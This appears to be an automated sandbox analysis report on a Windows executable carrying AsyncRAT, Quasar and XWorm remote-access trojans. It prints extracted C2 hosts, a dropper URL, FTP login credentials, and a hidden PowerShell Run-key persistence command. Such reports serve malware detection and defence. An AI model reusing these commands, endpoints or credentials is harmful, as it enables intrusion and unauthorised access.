asyncrat | dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f

Analysis

max time kernel
140s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 06:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
Size

27.1MB
MD5

1b3c6e3b3ab3641e0001874a99472682
SHA1

d0cd60a4bcc664f25d06bb678f0aa124d2b8fcf3
SHA256

dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f
SHA512

fac14eb191f7cca9edb2d6ef9d9c576eceaa32d6086ed54d7d816495f259f815b58b5dffc4a4914d0872fd99cdfdaabf08d72039fc4d27572330c6ef3c70532d
SSDEEP

786432:tUpZvYGW0XpRFuSd3T+FhP8I+gqcSorasy6nMk6DNk:ypFY8pRF4ticfb

Score

10^/10

asyncrat quasar xworm 07pjo24 biig2 defense_evasion discovery execution persistence rat spyware trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

quasar

Version

1.4.1

Botnet

BIIG2

4mekey1.myftp.biz:4782

Mutex

5c136035-7154-47b7-b78d-a0378c5e03a4

Attributes

encryption_key
5A1721840C7FCFA52998D9F98F97F4B8137E6734
install_name
Windows Server.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
Windows Update

Extracted

Family

asyncrat

Version

1.0.7

Botnet

07Pjo24

4mekey1.myftp.biz:8848

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

4Mekey1.myftp.biz:7000

Attributes

install_file
USB.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4956-427-0x0000000000400000-0x0000000000416000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/3596-87-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 14 IoCs

flow	pid	Process
45	364	powershell.exe
47	1452	powershell.exe
49	364	powershell.exe
50	1452	powershell.exe
52	364	powershell.exe
53	1452	powershell.exe
54	1452	powershell.exe
56	1452	powershell.exe
58	364	powershell.exe
59	1452	powershell.exe
60	364	powershell.exe
62	364	powershell.exe
64	5068	powershell.exe
65	4864	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5068	powershell.exe
3120	powershell.exe
4992	powershell.exe
4864	powershell.exe
2528	powershell.exe
1520	powershell.exe
364	powershell.exe
1452	powershell.exe
1416	powershell.exe
4868	powershell.exe
4784	powershell.exe
1704	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
4716	GlassPack.exe
2844	Setup.exe

Loads dropped DLL 10 IoCs

pid	Process
4716	GlassPack.exe
4716	GlassPack.exe
2844	Setup.exe
2844	Setup.exe
1300	MsiExec.exe
1300	MsiExec.exe
1300	MsiExec.exe
1300	MsiExec.exe
1300	MsiExec.exe
1300	MsiExec.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_tyl = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\ausun.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GlassPack = "cmd /c cd /d \"C:\\Users\\Admin\\Document\" && start \"\" \"C:\\Users\\Admin\\Document\\GlassPack.exe\""	GlassPack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_tyl = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\ausun.ps1' \";exit"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	Setup.exe
File opened (read-only)	\??\T:	Setup.exe
File opened (read-only)	\??\Z:	Setup.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	Setup.exe
File opened (read-only)	\??\G:	Setup.exe
File opened (read-only)	\??\L:	Setup.exe
File opened (read-only)	\??\P:	Setup.exe
File opened (read-only)	\??\R:	Setup.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	Setup.exe
File opened (read-only)	\??\O:	Setup.exe
File opened (read-only)	\??\Q:	Setup.exe
File opened (read-only)	\??\U:	Setup.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\A:	Setup.exe
File opened (read-only)	\??\Y:	Setup.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	Setup.exe
File opened (read-only)	\??\I:	Setup.exe
File opened (read-only)	\??\X:	Setup.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	Setup.exe
File opened (read-only)	\??\S:	Setup.exe
File opened (read-only)	\??\V:	Setup.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	Setup.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	Setup.exe
File opened (read-only)	\??\N:	Setup.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
63	pastebin.com
64	pastebin.com
65	pastebin.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4716 set thread context of 3596	4716	GlassPack.exe	94
PID 5068 set thread context of 2300	5068	powershell.exe	120
PID 4864 set thread context of 4956	4864	powershell.exe	121

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\Setup.exe	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\Uninstall.exe	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File created	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\Uninstall.ini	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\GlassPack.exe	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\msvcpcore.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\vcruntime140_1.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\jli.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\vcruntime140.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\api-ms-win-crt-environment-l1-1-0.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\api-ms-win-crt-locale-l1-1-0.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
File opened for modification	C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\api-ms-win-crt-math-l1-1-0.dll	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4884	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c7